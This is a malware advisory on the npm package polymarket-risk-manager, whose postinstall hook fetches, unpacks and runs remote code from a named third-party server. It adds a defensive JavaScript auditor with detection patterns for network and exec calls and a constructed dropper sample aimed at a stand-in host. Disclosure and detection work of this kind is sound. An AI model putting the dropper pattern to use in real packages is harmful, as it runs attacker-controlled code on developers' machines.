MAL-2026-6712
Malicious code in polymarket-risk-manager (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (54bfddce038bb64117d6850bb2977f8cee17704212e12e6214fb495b9d4cee79)

On `npm install`, the package's postinstall script reads a config URL from the `homepage` field of its own package.json (https://parket-server-help.vercel.app/config/psm-peer.json), fetches that config, downloads a tarball from the bundle URL it returns, extracts it, runs `npm install` inside the extracted directory, and then `require()`s `peer-math.js` from the fetched bundle and invokes `syncSession()` from it. Nothing is pinned: there is no version pin, hash check, or signature verification on either the config or the bundle, so the code that actually runs is whatever the server hands out at install time and can be swapped server-side without publishing a new package version. The destination domain (parket-server-help.vercel.app) is not Polymarket-owned, despite the polymarket-prefixed package name and the brand-adjacent hostname.

The package's stated purpose, Kelly stake math in a roughly 40-line kelly.js, needs no network bundle at all. The postinstall code is framed as a "peer sync" or "install check", accepts environment overrides for where it fetches from (PSM_PEER_URL, PSM_SYNC_CONFIG, KELLY_PEER_CONFIG), and catches every error, reporting it only as "install check skipped", so a failed or blocked fetch looks like a harmless no-op rather than a sign of anything unusual.

This is the canonical install-time dropper shape: arbitrary attacker-controlled JavaScript executes inside the installer's Node process, with the installing user's privileges and environment, during dependency installation.
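The following is an added example, not the package's code and not part of the OSV record: a heuristic audit that takes a parsed package.json plus the source of its lifecycle script and flags the dropper shape described above (a lifecycle hook that fetches remote content and then executes it). The manifest, file names, hostname and environment variable name in the samples are constructed for the demo; the indicator list is mine, not a published rule set.

```javascript
// Added example for this advisory (not the package's code, not part of the OSV
// record): heuristic audit of an npm manifest and its lifecycle script for the
// install-time dropper shape. All sample inputs below are constructed.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Indicators checked against the lifecycle script's source. Any one alone can be
// legitimate (native addons fetch prebuilt binaries, for example); verdict()
// looks for the combination "fetch remote content" + "execute what was fetched".
const INDICATORS = [
  { id: "network",         re: /\b(https?\.(get|request)|fetch\s*\(|axios|node-fetch|curl\s|wget\s)/,
    why: "contacts the network during install" },
  { id: "homepage_as_url", re: /\.homepage\b/,
    why: "reads a URL out of package.json's homepage field" },
  { id: "env_override",    re: /process\.env\.[A-Z0-9_]*(URL|CONFIG|PEER)\b/,
    why: "an environment variable can redirect where it fetches from" },
  { id: "archive_extract", re: /\btar\b.*(\s-?x|extract)|\bunzip\b/,
    why: "extracts a downloaded archive" },
  { id: "nested_install",  re: /\b(execSync|exec|spawnSync|spawn)\s*\([^)]*npm\s+(install|i|ci)\b/,
    why: "runs a nested npm install" },
  { id: "dynamic_require", re: /require\s*\(\s*[^'")\s]/,
    why: "require()s a computed path instead of a string literal" },
  { id: "swallowed_error", re: /catch\s*(\([^)]*\))?\s*\{[^}]*skipped/i,
    why: "hides every failure behind a benign 'skipped' message" },
];

// Manifest-level check: a homepage that is itself a JSON document is not a
// project page, it is a configuration endpoint (the advisory's package did this).
function auditManifest(manifest) {
  const findings = [];
  const homepage = typeof manifest.homepage === "string" ? manifest.homepage : "";
  if (/\.json(\?.*)?$/i.test(homepage)) {
    findings.push({ where: "homepage", indicator: "homepage_is_json",
      why: "homepage points at a JSON document rather than a project page" });
  }
  return findings;
}

// `files` maps a path relative to the package root to that file's source text.
function auditPackage(manifest, files) {
  const findings = auditManifest(manifest);
  const scripts = manifest.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    findings.push({ where: hook, indicator: "lifecycle_script",
      why: 'runs "' + cmd + '" at install time' });
    // If the hook is `node <file>`, inspect that file; otherwise inspect the command line.
    const m = /\bnode\s+(\S+)/.exec(cmd);
    const source = m && files[m[1]] !== undefined ? files[m[1]] : cmd;
    for (const ind of INDICATORS) {
      if (ind.re.test(source)) findings.push({ where: hook, indicator: ind.id, why: ind.why });
    }
  }
  return findings;
}

// A lifecycle hook alone is worth a look; fetching remote content and then
// executing it during install is the dropper shape.
function verdict(findings) {
  const ids = new Set(findings.map((f) => f.indicator));
  const runsAtInstall = ids.has("lifecycle_script");
  const fetchesRemote = ids.has("network") || ids.has("homepage_as_url") || ids.has("env_override");
  const executesFetched = ids.has("nested_install") || ids.has("dynamic_require") || ids.has("archive_extract");
  if (runsAtInstall && fetchesRemote && executesFetched) return "dropper-shape";
  if (runsAtInstall) return "review";
  return "clean";
}

// Constructed sample modelled on the shape the advisory describes. This is NOT
// the real postinstall script; URL, env var name and file names are made up.
const CONSTRUCTED_POSTINSTALL = [
  'const https = require("https"), path = require("path");',
  'const { execSync } = require("child_process");',
  'const pkg = require("./package.json");',
  'const cfgUrl = process.env.EXAMPLE_PEER_URL || pkg.homepage;',
  'try {',
  '  https.get(cfgUrl, (res) => { /* parse bundle URL, save .tgz to tgz */ });',
  '  execSync("tar -xzf " + tgz + " -C " + dir);',
  '  execSync("npm install", { cwd: dir });',
  '  require(path.join(dir, "peer.js")).syncSession();',
  '} catch (e) { console.log("install check skipped"); }',
].join("\n");

const CONSTRUCTED_MANIFEST = {                      // constructed, not the real package
  name: "acmemarket-risk-manager",
  version: "1.0.0",
  homepage: "https://acme-server-help.example.invalid/config/peer.json",
  scripts: { postinstall: "node scripts/install-check.js" },
};
const CONSTRUCTED_FILES = { "scripts/install-check.js": CONSTRUCTED_POSTINSTALL };
const CLEAN_MANIFEST = { name: "kelly-math", version: "1.0.0", homepage: "https://example.invalid/kelly-math" };

// Stand-alone demo: prints the verdict and the reasons for each sample.
for (const [label, manifest, files] of [
  ["constructed dropper", CONSTRUCTED_MANIFEST, CONSTRUCTED_FILES],
  ["clean package", CLEAN_MANIFEST, {}],
]) {
  const findings = auditPackage(manifest, files);
  console.log(label + ": " + verdict(findings));
  for (const f of findings) console.log("  [" + f.where + "] " + f.indicator + ": " + f.why);
}
```

To run this over an installed tree, feed it each node_modules/<pkg>/package.json parsed with JSON.parse together with a map of the script files read from that package directory. Independently of any scanner, installing with `npm install --ignore-scripts` (or setting `npm config set ignore-scripts true`) stops this whole class of payload from executing, at the cost of running legitimate build hooks explicitly afterwards.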
Affected packages
No fixed version published yet for polymarket-risk-manager (npm). Pin to a known-safe version or switch to an alternative. Since the package is malicious by design rather than vulnerable, the practical remediation is removal: drop it from dependency manifests and lockfiles, and treat any host that ran `npm install` with lifecycle scripts enabled while it was present as having executed attacker-controlled code, because the payload was fetched from the remote server at install time and is not contained in the package tarball itself.